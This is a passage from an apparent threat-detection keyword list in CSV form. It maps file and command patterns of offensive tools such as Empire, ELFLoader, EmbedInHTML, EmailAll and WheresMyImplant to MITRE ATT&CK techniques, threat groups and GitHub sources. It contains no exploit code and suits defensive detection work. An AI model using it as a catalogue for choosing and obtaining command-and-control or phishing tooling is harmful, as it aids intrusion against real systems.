x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*ELFLoader.out*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*elite-proxy-finder*,offensive_tool_keyword,elite-proxy-finder,Finds elite anonymity (L1) HTTP proxies then tests them all in parallel. Tests each proxy against 3 IP checking URLs including one which is HTTPS to make sure it can handle HTTPS requests. Then checks the proxy headers to confirm its an elite L1 proxy that will not leak any extra info. By default the script will only print the proxy IP. request time. and country code of proxies that pass all four tests but you can see all the results including errors in any of the tests with the -a (--all) option.,T1586.001 - T1041.002 - T1105.002 - T1573.001 - T1135.002 - T1134.002 - T1016.001,TA0011 - TA0010 - TA0005 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/DanMcInerney/elite-proxy-finder,1,1,N/A,N/A,3,247,106,2016-11-23T10:31:33Z,2014-04-17T11:23:20Z -*emailall.py -*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,0,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*emailall.py check*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,0,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*EmailAll-master.*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,1,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*embedInHTML.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,N/A,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*embedInHTML.py*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*EmbedInHTML-master*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*empire AttackServers*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,0,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*Empire Framework GUI*,offensive_tool_keyword,empire,The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework,T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001,TA0002 - TA0010 - TA0011 ,N/A,N/A,C2,https://github.com/EmpireProject/Empire-GUI,1,0,N/A,10,10,471,145,2022-03-10T11:34:46Z,2018-04-20T21:59:52Z -*empire --rest *,offensive_tool_keyword,empire,empire command lines patterns,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*empire --server *,offensive_tool_keyword,empire,The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework,T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001,TA0002 - TA0010 - TA0011 ,N/A,N/A,C2,https://github.com/EmpireProject/Empire-GUI,1,0,N/A,10,10,471,145,2022-03-10T11:34:46Z,2018-04-20T21:59:52Z -*Empire.Agent.Coms.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Empire.Agent.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Empire.Agent.Jobs.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Empire.Agent.Stager.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*empire/client/*.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire/server/*.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire/server/downloads/*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire/server/downloads/logs/*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire_exec.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*empire_server.*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empireadmin*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire-chain.pem*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*EmpireCORSMiddleware*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*Empire-GUI.git*,offensive_tool_keyword,empire,The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework,T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001,TA0002 - TA0010 - TA0011 ,N/A,N/A,C2,https://github.com/EmpireProject/Empire-GUI,1,1,N/A,10,10,471,145,2022-03-10T11:34:46Z,2018-04-20T21:59:52Z -*Empire-master*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*empire-priv.key*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*EmpireProject*,offensive_tool_keyword,empire,Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.,T1027 - T1059 - T1071 - T1070 - T1072,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,POST Exploitation tools,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Empire-Sponsors.git*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire-test-kalirolling*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 